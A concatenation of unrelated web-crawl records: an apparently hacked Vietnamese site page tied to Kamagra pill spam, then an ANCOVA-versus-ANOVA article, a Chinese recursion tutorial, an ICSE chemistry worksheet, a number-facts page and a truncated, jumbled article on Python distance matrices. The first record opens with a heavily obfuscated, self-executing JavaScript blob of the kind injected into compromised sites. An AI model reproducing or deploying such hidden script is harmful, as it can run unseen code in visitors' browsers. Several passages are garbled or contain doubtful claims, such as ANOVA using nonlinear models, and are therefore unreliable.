!![]+[])[+[]]+\\$+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+\\$+(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+\\$+\\$+(!![]+[])[+[]]+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+([]+[]+{})[!+[]+!+[]]+(![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+\\$+\\$+(!![]+[])[+!+[]]+([]+[]+{})[+!+[]]+(!![]+[])[!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+\\$+([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[+[]]+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+\\$+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+\\$)();\n\nVN:F [1.9.22_1171]" ]
[ null, "http://dienlanhduyhieu.com/wp-content/themes/duyhieu/images/face.png", null, "http://dienlanhduyhieu.com/wp-content/themes/duyhieu/images/rss.png", null, "http://dienlanhduyhieu.com/wp-content/themes/duyhieu/images/twiter.png", null, "http://dienlanhduyhieu.com/wp-content/themes/duyhieu/images/youtube.png", null, "http://dienlanhduyhieu.com/wp-content/themes/duyhieu/images/imggioithieu.jpg", null, "https://images.unlimrx.com/promo/en/kamagra.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7875673,"math_prob":1.0000043,"size":30943,"snap":"2020-34-2020-40","text_gpt3_token_len":11058,"char_repetition_ratio":0.37305665,"word_repetition_ratio":0.0016118633,"special_character_ratio":0.4740652,"punctuation_ratio":0.26879272,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9989485,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-24T18:00:00Z\",\"WARC-Record-ID\":\"<urn:uuid:8e675e91-4f02-4739-ae1a-d503d5062b1c>\",\"Content-Length\":\"58232\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cd4445b4-f2f5-467c-8f49-33d7e5388e16>\",\"WARC-Concurrent-To\":\"<urn:uuid:f7b54971-1a23-4e74-954b-10f2948f161d>\",\"WARC-IP-Address\":\"45.117.81.235\",\"WARC-Target-URI\":\"http://dienlanhduyhieu.com/kamagra-pills-cheap-discount-kamagra-online.html\",\"WARC-Payload-Digest\":\"sha1:YGYAIYMX3FK4INHU4J7YOZSJ4PJDO3WB\",\"WARC-Block-Digest\":\"sha1:FS5FMXWOJ6MO2LTXLQZMXB3ABRAUCB4M\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400219691.59_warc_CC-MAIN-20200924163714-20200924193714-00412.warc.gz\"}"}
https://www.difference.wiki/ancova-vs-anova/
[ "# Difference Between ANCOVA and ANOVA\n\n### Main Difference\n\nANCOVA and ANOVA are two statistical techniques for equating samples or groups on one or more than one variables. They are used to perform the same function but the method adopted is different. ANCOVA is more robust and unbiased as compared to ANOVA. ANCOVA is exactly like ANOVA, except the effects of a third variable are statistically “controlled out”. ANCOVA only uses a general linear model while ANOVA uses linear as well nonlinear models.\n\n### What is ANCOVA?\n\nANCOVA is a statistical technique used to equate samples or groups on one or more than one variables. ANCOVA stands for “Analysis of Covariance”. It is an analysis technique which has two or more variables. Variables involved in ANCOVA should be at least one continuous and one categorical predictor variable. It is a test method for testing the effect of outcome variable after removing the variance. It uses covariant to improve its statistical power. ANCOVA implies that there is a linear relationship between dependent and independent variables.\n\n### What is ANOVA?\n\nANOVA is a statistical technique used to equate samples or groups on one or more than one variables. ANOVA stands for “Analysis of Variance” in statistics. It is tested to check the presence of common mean among various groups. It is quite a useful test as compared to t-tests for such purposes. There are different types of ANOVA including ½ One-way ANOVA, ½ Factorial ANOVA, ½ Repeated measure ANOVA and MANOVA.\n\n### Key Differences\n\n1. ANCOVA uses covariant while ANOVA doesn’t use covariant.\n2. A Distinguished feature of ANOVA is BG while in a case of ANCOVA, BG is divided into TX and COV variation.\n3. Both ANOVA and ANCOVA use WG variation. In ANCOVA WG variation is divided by individual differences as COV while ANOVA uses it for individual features only.\n4. ANCOVA is more robust and unbiased as compared to ANOVA.\n5. ANCOVA is exactly like ANOVA, except the effects of a third variable are statistically “controlled out”.\n6. ANCOVA only uses a general linear model while ANOVA uses linear as well nonlinear models.\n\n### Comparison Video", null, "", null, "##### Samantha Walker\n\nView all posts by Samantha Walker" ]
[ null, "https://i.ytimg.com/vi/PyrDq1luGOc/hqdefault.jpg", null, "https://secure.gravatar.com/avatar/6435f23ec60904334735ba7c03f9c25d", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92173773,"math_prob":0.9003723,"size":2057,"snap":"2019-51-2020-05","text_gpt3_token_len":471,"char_repetition_ratio":0.1529469,"word_repetition_ratio":0.2647059,"special_character_ratio":0.19154108,"punctuation_ratio":0.083333336,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98344314,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,3,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-23T08:13:50Z\",\"WARC-Record-ID\":\"<urn:uuid:6def557e-ec20-4077-aacc-b2fde2eb3bcb>\",\"Content-Length\":\"50602\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7bd36ea7-26b5-46ba-9a38-f7f01ddd7dcc>\",\"WARC-Concurrent-To\":\"<urn:uuid:7846be3c-1e02-448b-b561-69d9670d2251>\",\"WARC-IP-Address\":\"104.18.42.36\",\"WARC-Target-URI\":\"https://www.difference.wiki/ancova-vs-anova/\",\"WARC-Payload-Digest\":\"sha1:M3VPSX3UI42LVCLIZAC5GRSVQXEQSEFR\",\"WARC-Block-Digest\":\"sha1:MIAEDWZ37L47KJPTUTJ537UWPU6T2AEW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250609478.50_warc_CC-MAIN-20200123071220-20200123100220-00142.warc.gz\"}"}
http://xiantang.info/articles/2019/06/03/1559551188964.html
[ "#", null, "咸糖记录编程的地方\n\n/\n\n## 递归-自上而下的思想\n\n``````def greet2(name):\nprint(\"how are you, \" + name + \"?\")\ndef bye():\nprint(\"ok bye!\")\n\ndef greet(name):\nprint(\"hello, \" + name + \"!\")\ngreet2(name)\nprint(\"getting ready to say bye...\")\nbye()\ngreet('maggie')\n``````", null, "", null, "", null, "", null, "", null, "``````def fact(x):\nif x == 1:\nreturn 1\nelse:\nreturn x * fact(x-1)\na = fact(3)\nprint(a)\n``````\n\n`else:return x * fact(x-1)`是递归条件。", null, "617.合并二叉树\n\n``````\tTree 1 Tree 2\n1 2\n/ \\ / \\\n3 2 1 3\n/ \\ \\\n5 4 7\n``````\n\n``````\t 3\n/ \\\n4 5\n/ \\ \\\n5 4 7\n``````\n\n``````class Solution {\npublic TreeNode mergeTrees(TreeNode t1, TreeNode t2) {\n\nTreeNode res = mergeTree(t1,t2);\nreturn res;\n}\n\npublic TreeNode mergeTree(TreeNode t1,TreeNode t2){\nif(t1==null)\nreturn t2;\nif(t2==null)\nreturn t1;\nt1.val +=t2.val;\nt1.left= mergeTrees(t1.left,t2.left);\nt1.right = mergeTrees(t1.right,t2.right);\nreturn t1;\n\n}\n}\n``````" ]
[ null, "https://img.hacpai.com/file/2019/07/favicon-f0db3455.png", null, "https://img-blog.csdn.net/20180422211333306", null, "https://img-blog.csdn.net/20180422211638439", null, "https://img-blog.csdn.net/20180422211829680", null, "https://img-blog.csdn.net/20180422211925335", null, "https://img-blog.csdn.net/20180422211925335", null, "https://img-blog.csdn.net/20180422213233786", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.8903621,"math_prob":0.99737614,"size":2430,"snap":"2019-35-2019-39","text_gpt3_token_len":1840,"char_repetition_ratio":0.09356966,"word_repetition_ratio":0.019900497,"special_character_ratio":0.24320988,"punctuation_ratio":0.15430267,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97616917,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],"im_url_duplicate_count":[null,null,null,1,null,2,null,2,null,4,null,4,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-20T22:48:25Z\",\"WARC-Record-ID\":\"<urn:uuid:a6cfcec9-ace8-44bd-a7b5-2152e1f8f39a>\",\"Content-Length\":\"32559\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b4c6e9f2-532b-4b04-aa4e-f8c3757d90ff>\",\"WARC-Concurrent-To\":\"<urn:uuid:53c58e11-9ecf-4fda-aaf0-04d3163f80f0>\",\"WARC-IP-Address\":\"144.202.121.27\",\"WARC-Target-URI\":\"http://xiantang.info/articles/2019/06/03/1559551188964.html\",\"WARC-Payload-Digest\":\"sha1:JVUEQYUZ2TDJRGULBIV55KUS7WUAMA5V\",\"WARC-Block-Digest\":\"sha1:YD47ATNRLVQKGT5HAZFVAHXTCP3DNRYH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514574084.88_warc_CC-MAIN-20190920221241-20190921003241-00172.warc.gz\"}"}
https://www.pw.live/worksheet-class-8/icse-class-8-chemistry/chapter-4-basic-chemistry
[ "# ICSE Worksheet for Chapter - 4 Basic Chemistry-Terminology and Reaction Class 8\n\n## Find ICSE Worksheet for chapter-4 Basic Chemistry-Terminology and Reaction class 8\n\n1. CLASS-8\n2. BOARD: ICSE\n3. Chemistry Worksheet - 4\n4. TOPIC: Basic Chemistry-Terminology and Reaction\n5. For other ICSE Worksheet for class 8 Science check out main page of Physics Wallah.\n\n#### SUMMARY –\n\n• Symbols: definition, representation by John Dalton and Berzelius.\n• Meaning of symbol, radicals, valency, variablevalency.\n• Molecular formula, chemical equation and its balancing.\n• Main types of chemical equations –\n1. Direct combination.\n2. Decomposition.\n3. Single displacement.\n4. Double decomposition.\n5. Reversible.\n6. Catalytic.\n7. Exothermic and endothermic.\n8. Oxidation and reduction.\n\n#### SECTION – 1\n\n1. Write the chemical names of the following compounds :\n1. Ca₃(PO₄)₂\n2. K₂CO₃\n3. KMnO₄\n4. K2Cr2O7\n5. Mg(HCO₃)₂ F) Pb(NO3)2\n6. BaSO4 H) Ag₂O\n7. (CH₃COO)₂Pb J) CaC2\n2. Write the basic and acidic radicals of these compounds and then write the chemical formula.\n1. Barium sulphate\n2. Ammonium nitrate\n3. Calcium bromide\n4. Chromium sulphate\n5. Ferrous sulphide\n6. Calcium phosphate\n7. Potassium iodide\n8. Stannic oxide\n9. Calcium silicate\n10. Sodium zincate\n3. Balance the following equation :\n1. Fe + H₂O → Fe₃O₄ + H₂\n2. Ca + N₂ → Ca₃N₂\n3. Zn + KOH → K₂ZnO₂ + H₂\n4. Fe₂O₃ + CO → Fe + CO₂\n5. PbO + NH₃ → Pb + H₂O + N₂\n6. Pb₃O₄ → PbO + O₂\n7. PbS + O₂ → PbO + SO₂\n8. S + H₂SO₄ → SO₂ + H₂O\n9. S + HNO₃ → H₂SO₄ + NO₂ + H₂O\n10. MnO₂ + HCl → MnCl₂ + H₂O + Cl₂\n11. C + H₂SO₄ → CO₂ + H₂O + SO₂\n4. Write the balanced chemical equation of the following reactions.\n1. Sodium hydroxide + sulphuric acid → sodium sulphate + water\n2. Potassium bicarbonate + sulphuric acid → potassium sulphate + carbon dioxide + water\n3. Iron + sulphuric acid → ferrous sulphate + hydrogen\n4. Chlorine + sulphur dioxide + water → sulphuric acid + hydrogen chloride\n5. Silver nitrate → silver + nitrogen dioxide + oxygen\n6. Copper + nitric acid → copper nitrate + nitric oxide + water\n7. Ammonia + oxygen → nitric oxide + water\n8. Barium chloride + sulphuric acid → barium sulphate + hydrochloric acid\n9. Zinc sulphide + oxygen → zinc oxide + sulphur dioxide\n10. Aluminium carbide + water → Aluminium hydroxide + methane\n\n#### SECTION -2\n\n1. What is a symbol ? What information does it convey ?\n2. Sodium chloride reacts with silver nitrate to produce silver chloride and sodium nitrate\n1. Write the equation.\n2. Check whether it is balanced, if not balance it.\n3. Find the weights of reactants and products.\n4. What information can be drawn by the above ?\n1. What are poly-atomic ions ? Give two examples.\n2. Name the fundamental law which is involved in every equation.\n3. Explain the meaning of the term ‘reversible reactions’. Give three different reversible reactions with conditions in which two gases combine to give a gaseous product.\n4. The following reaction :<\nCl2 +H2S à2HCl + S Is a redox reaction. Give reason why ?\n5. What is a catalyst ? Give two examples of catalytic reactions." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7031456,"math_prob":0.9676263,"size":3519,"snap":"2023-14-2023-23","text_gpt3_token_len":1027,"char_repetition_ratio":0.1200569,"word_repetition_ratio":0.0091883615,"special_character_ratio":0.2617221,"punctuation_ratio":0.07606679,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98325884,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-29T19:56:34Z\",\"WARC-Record-ID\":\"<urn:uuid:cd1934f9-c6a6-4f42-bca9-c5e82daa3fb2>\",\"Content-Length\":\"152238\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:04d7185d-1492-4009-b43c-9116aca3f44f>\",\"WARC-Concurrent-To\":\"<urn:uuid:80bd7082-d4c9-46ac-8adc-c019d2e04d53>\",\"WARC-IP-Address\":\"108.138.85.53\",\"WARC-Target-URI\":\"https://www.pw.live/worksheet-class-8/icse-class-8-chemistry/chapter-4-basic-chemistry\",\"WARC-Payload-Digest\":\"sha1:3777LSMQDZO5MPY5I5DB5ZIWUL7JPGKF\",\"WARC-Block-Digest\":\"sha1:RJSJMXZSMGDRYSG3U74F75ENMB5XPFIO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949025.18_warc_CC-MAIN-20230329182643-20230329212643-00708.warc.gz\"}"}
https://metanumbers.com/1427821381
[ "## 1427821381\n\n1,427,821,381 (one billion four hundred twenty-seven million eight hundred twenty-one thousand three hundred eighty-one) is an odd ten-digits composite number following 1427821380 and preceding 1427821382. In scientific notation, it is written as 1.427821381 × 109. The sum of its digits is 37. It has a total of 4 prime factors and 16 positive divisors. There are 1,136,070,144 positive integers (up to 1427821381) that are relatively prime to 1427821381.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Odd\n• Number length 10\n• Sum of Digits 37\n• Digital Root 1\n\n## Name\n\nShort name 1 billion 427 million 821 thousand 381 one billion four hundred twenty-seven million eight hundred twenty-one thousand three hundred eighty-one\n\n## Notation\n\nScientific notation 1.427821381 × 109 1.427821381 × 109\n\n## Prime Factorization of 1427821381\n\nPrime Factorization 7 × 17 × 73 × 164363\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 4 Total number of distinct prime factors Ω(n) 4 Total number of prime factors rad(n) 1427821381 Product of the distinct prime numbers λ(n) 1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 1 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 1,427,821,381 is 7 × 17 × 73 × 164363. Since it has a total of 4 prime factors, 1,427,821,381 is a composite number.\n\n## Divisors of 1427821381\n\n16 divisors\n\n Even divisors 0 16 8 8\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 16 Total number of the positive divisors of n σ(n) 1.75146e+09 Sum of all the positive divisors of n s(n) 3.23641e+08 Sum of the proper positive divisors of n A(n) 1.09466e+08 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 37786.5 Returns the nth root of the product of n divisors H(n) 13.0435 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 1,427,821,381 can be divided by 16 positive divisors (out of which 0 are even, and 16 are odd). The sum of these divisors (counting 1,427,821,381) is 1,751,462,784, the average is 109,466,424.\n\n## Other Arithmetic Functions (n = 1427821381)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 1136070144 Total number of positive integers not greater than n that are coprime to n λ(n) 11834064 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 71240798 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 1,136,070,144 positive integers (less than 1,427,821,381) that are coprime with 1,427,821,381. And there are approximately 71,240,798 prime numbers less than or equal to 1,427,821,381.\n\n## Divisibility of 1427821381\n\n m n mod m 2 3 4 5 6 7 8 9 1 1 1 1 1 0 5 1\n\nThe number 1,427,821,381 is divisible by 7.\n\n## Classification of 1427821381\n\n• Arithmetic\n• Deficient\n\n• Polite\n\n• Square Free\n\n### Other numbers\n\n• LucasCarmichael\n\n## Base conversion (1427821381)\n\nBase System Value\n2 Binary 1010101000110101101001101000101\n3 Ternary 10200111200211201101\n4 Quaternary 1111012231031011\n5 Quinary 10411010241011\n6 Senary 353403100101\n8 Octal 12506551505\n10 Decimal 1427821381\n12 Duodecimal 33a211631\n16 Hexadecimal 551ad345\n20 Vigesimal 1263hd91\n36 Base36 nm3611\n\n## Basic calculations (n = 1427821381)\n\n### Multiplication\n\nn×i\n n×2 2855642762 4283464143 5711285524 7139106905\n\n### Division\n\nni\n n⁄2 7.13911e+08 4.7594e+08 3.56955e+08 2.85564e+08\n\n### Exponentiation\n\nni\n n2 2038673896040747161 2910862177653550043690849341 4156191254397959162935278843129559921 5934298736554616375603853851417330608324470901\n\n### Nth Root\n\ni√n\n 2√n 37786.5 1126.05 194.388 67.754\n\n## 1427821381 as geometric shapes\n\n### Circle\n\nRadius = n\n Diameter 2.85564e+09 8.97127e+09 6.40468e+18\n\n### Sphere\n\nRadius = n\n Volume 1.2193e+28 2.56187e+19 8.97127e+09\n\n### Square\n\nLength = n\n Perimeter 5.71129e+09 2.03867e+18 2.01924e+09\n\n### Cube\n\nLength = n\n Surface area 1.2232e+19 2.91086e+27 2.47306e+09\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 4.28346e+09 8.82772e+17 1.23653e+09\n\n### Triangular Pyramid\n\nLength = n\n Surface area 3.53109e+18 3.43048e+26 1.16581e+09\n\n## Cryptographic Hash Functions\n\nmd5 47982a45adc2b28b5608cbbdd7e85a46 0155c1db5159ace2968e54868699d6b04fd46093 741366641a8223bc9160f88557b6b414b14d9871b561ddd59be84bc36699e1f5 b399c8d3f63d4435b4370db627a3876daf7154089609cb10a048803415c5ebd8c159c5eed5848c29242ef60b55074de2e6bd5f82b09243cb58100a82db1ee9c7 0684e81fde59ce0e1bab082d5a1556643f9ee6b2" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.61360997,"math_prob":0.9754525,"size":5123,"snap":"2021-21-2021-25","text_gpt3_token_len":1817,"char_repetition_ratio":0.123656966,"word_repetition_ratio":0.053008597,"special_character_ratio":0.49346086,"punctuation_ratio":0.100928076,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99561745,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-20T01:36:45Z\",\"WARC-Record-ID\":\"<urn:uuid:e31cf00d-2c2f-49db-be50-5ac28001a880>\",\"Content-Length\":\"60912\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5b52f73f-2f9e-4fd6-9983-2df56701a257>\",\"WARC-Concurrent-To\":\"<urn:uuid:3810d0cc-4e3c-4717-af1e-d5c2f9013c70>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/1427821381\",\"WARC-Payload-Digest\":\"sha1:YQ3FMFBMD5LKM2G5OYP6YF52M23VZVSE\",\"WARC-Block-Digest\":\"sha1:IVARIXXVULUABQHAHT54RF4HJ4YFEJQZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487653461.74_warc_CC-MAIN-20210619233720-20210620023720-00196.warc.gz\"}"}
http://eimearbyrnedance.com/b9hkctpt/0101df-ethiopian-airlines-boeing-787-8-seat-map
[ "# ethiopian airlines boeing 787 8 seat map\n\nI recommend using the Google Maps Distance Matrix API for this purpose. Google Map Distance Matrix API is a service that provides travel distance and time is taken to reach a destination. Calculate Euclidean distance between two points using Python. Now that the origin and destination coordinates are known, we can pass these values as parameters into the distance_matrix function to execute the API calls. We can take this formula now and translate it … fly wheels)? We are aiming to calculate the distance between coordinates in consecutive rows and store the value in a new column called ‘Distance’. In Europe, can I refuse to use Gsuite / Office365 at work? As a final step, we can write its contents to a CSV file. As per wiki definition. Thanks for contributing an answer to Stack Overflow! Instead, the optimized C version is more efficient, and we call it using the following syntax: dm = cdist(XA, XB, 'sokalsneath') Which Minkowski p-norm to use. Instead of manually doing that, I create this Maps Distance and Duration Matrix Generator from provided location longitude and latitude by using Google Maps Distance Matrix API. #python-google-distance-matrix. To learn more, see our tips on writing great answers. Asking for help, clarification, or responding to other answers. country (str or list) – Country to filter result in form of ISO 3166-1 alpha-2 country code (e.g. Since the CSV file is already loaded into the data frame, we can loop through the latitude and longitude values of each row using a function I initialized as Pairwise. Given a set of n (n > 4) points and its distances and knowing that the Menger determinant is equal to zero, how can I obtain the coordinates in R^3 of these points? You can indicate the transport mode that you wish to use. If you wish to calculate distance using other transport modes, you need to consider the accuracy of your coordinates. ... Ewoud. \\$\\endgroup\\$ – Spacedman Jul 28 '14 at 13:45 The arrays are not necessarily the same size. is it nature or nurture? NumPy: Array Object Exercise-103 with Solution. (Haversine formula), Fastest way to determine if an integer's square root is an integer, Shortest distance between a point and a line segment, Easy interview question got harder: given numbers 1..100, find the missing number(s) given exactly k are missing, Grouping functions (tapply, by, aggregate) and the *apply family. It is a method of changing an entity from one data type to another. Requirements. The For Loop is used in conjunction with the Pairwise helper function to iterate through the rows. python numpy euclidean distance calculation between matrices of , While you can use vectorize, @Karl's approach will be rather slow with numpy arrays. For example: xy1=numpy.array( [[ 243, 3173], [ 525, 2997]]) xy2=numpy.array( [[ … What are the earliest inventions to store and release energy (e.g. However, you want to make sure that you get the actual distance of the specific route segment that was followed (not as the crow flies). googlemaps — API for distance matrix calculations. Making statements based on opinion; back them up with references or personal experience. We have a data set with ‘Latitude’ and ‘Longitude’ values. Final Output of pairwise function is a numpy matrix which we will convert to a dataframe to view the results with City labels and as a distance matrix. Convert distance matrix to 2D projection with Python In my continuing quest to never use R again, I've been trying to figure out how to embed points described by a distance matrix into 2D. Parameters x (M, K) array_like. The full google-maps-distance.py script is below: Was there ever any actual Spaceballs merchandise? If you do not have a Google Maps API key yet, check out the link below to setup a project and get your API key: In this step, we load the CSV file into a data frame. Now that the origin and destination coordinates are known, we can pass these values as parameters into the distance_matrix function to execute the API calls. (Who is one?). A 1 kilometre wide sphere of U-235 appears in an orbit around our planet. Note that we transform the element 0.0 in the matrix into a large value for processing by Gaussian exp(-d^2), where d is the distance. \"\"\" Perhaps posting this to math.stackoverflow would yield better results, Using distance matrix to find coordinate points of set of points, Finding the coordinates of points from distance matrix, Podcast 302: Programming in PowerPoint can teach you a few things, Calculate distance between two latitude-longitude points? List of place name, longitude, and latitude provided on coordinate.csv file. Is there a quick way to compute this distance matrix manually? Might be a Python list of strings. your coworkers to find and share information. The API adheres to the rules of the road. In mathematics, computer science and especially graph theory, a distance matrix is a square matrix containing the distances, taken pairwise, between the elements of a set. Python scipy.spatial.distance_matrix() Examples ... \"\"\"Create the distance matrix from a set of 3D coordinates. can mac mini handle the load without eGPU? p float, 1 <= p <= infinity. How to Install GeoPy ? site design / logo © 2021 Stack Exchange Inc; user contributions licensed under cc by-sa. What exactly do you need help with? Calculate driving distance using Google Distance Matrix API in Python. You can view the full code on my GitHub page. Files for google-distance-matrix, version 0.1.8; Filename, size File type Python version Upload date Hashes; Filename, size google-distance-matrix-0.1.8.tar.gz (2.6 kB) File type Source Python version None Upload date Sep 25, 2014 Hashes View Code to retrieve information about distance matrix service from Google. Is there a quick way to compute this distance matrix manually? As a result, the function above produced a dictionary with all the “distance” data for these coordinates. Use the test.py for a sample execution. – A coordinate to bias local results based on a provided location. Why do we use approximate in the present and estimated in the past? Computes the normalized Hamming distance, or the proportion of those vector elements between two n-vectors u and v which disagree. Available modes are: ‘driving”, “walking”, “transit” or “bicycling”. To calculate Euclidean distance with NumPy you can use numpy.linalg.norm:. This API returns the recommended route(not detailed) between origin and destination, which consists of duration and distance values for each pair. For each iteration in the loop, latitude and longitude values are stored as pairs in the ‘origin’ and ‘destination’ variables, respectively. bbox (list or tuple of 2 items of geopy.point.Point or (latitude, longitude) or \"%(latitude)s, %(longitude)s\".) Why? \\$\\begingroup\\$ You need to find an algorithm that takes a pre-computed distance matrix or allows you to supply a distance-function that it can call when it needs to compute distances. replace text with part of text using regex with bash perl. GeoPy is a Python library that makes geographical calculations easier for the users. Compute the distance matrix. This means, that if there is a slight chance that your coordinates are off by a few meters, the API may consider the coordinate in a oncoming traffic lane (especially on highways). Final Output of pairwise function is a numpy matrix which we will convert to a dataframe to view the results with City labels and as a distance matrix. That’s it. This can be done with several manifold embeddings provided by scikit-learn . The basic idea is to add one point at a time that satisfies the distance constraints for (up to four) previous points. Python Exercises, Practice and Solution: Write a Python program to compute the distance between the points (x1, y1) and (x2, y2). Get started. You access the Distance Matrix API through an HTTP interface, with requests constructed as a URL string, using origins and destinations, along with your API key.The following example requests the distance matrix data between Washington, DC and New York City, NY, in JSON format:Try it! Distance Matrix. If you have any suggestions, feel free to comment below or contact me on LinkedIn. The pairwise function is using a helper function from the itertools package, called tee. Write a NumPy program to calculate the Euclidean distance. This API returns the recommended route(not detailed) between origin and destination, which consists of duration and distance values for each pair. Follow. I can set one of these points in the coordinate (0,0) to simpify, and find the others. I have two arrays of x-y coordinates, and I would like to find the minimum Euclidean distance between each point in one array with all the points in the other array. Similarly, we can get information about the distance or drive time between locations using the Google Maps Distance Matrix API. Perform Principal Coordinate Analysis. Python Exercises, Practice and Solution: Write a Python program to compute the distance between the points (x1, y1) and (x2, y2). Computes the Jaccard distance between the points. ... we will now create a dictionary with all the information available through Google Distance Matrix API between two coordinates: d_goog = gmap.distance_matrix(p_1, p_2, mode='driving') prnt(d_goog) I have a set of points (with unknow coordinates) and the distance matrix. So, the easiest way to perform this task is to make use of a mapping web service or API that can do all the grunt work. FR). You want to calculate the distance between each pair of coordinates in consecutive rows. I have downloaded a sample data set made available on the UCI Machine Learning Repository. An empty list item is created to store the calculated distances. Code to retrieve information about distance matrix service from Google. I've used as my main reference however I do not know how to handle this algorithm in a 3D plot. All the data that we are interested in are now stored in the data frame. would calculate the pair-wise distances between the vectors in X using the Python function sokalsneath. This would result in sokalsneath being called (n 2) times, which is inefficient. You should have a CSV file with distances between consecutive rows. We are not trying to reinvent the wheel here. Can Law Enforcement in the US use evidence acquired through an illegal act by someone else? a, b = input().split() Type Casting. How to use Google Distance Matrix API in Python, Standard Error — A clear intuition from scratch, Analyzing the eigenvalues of a 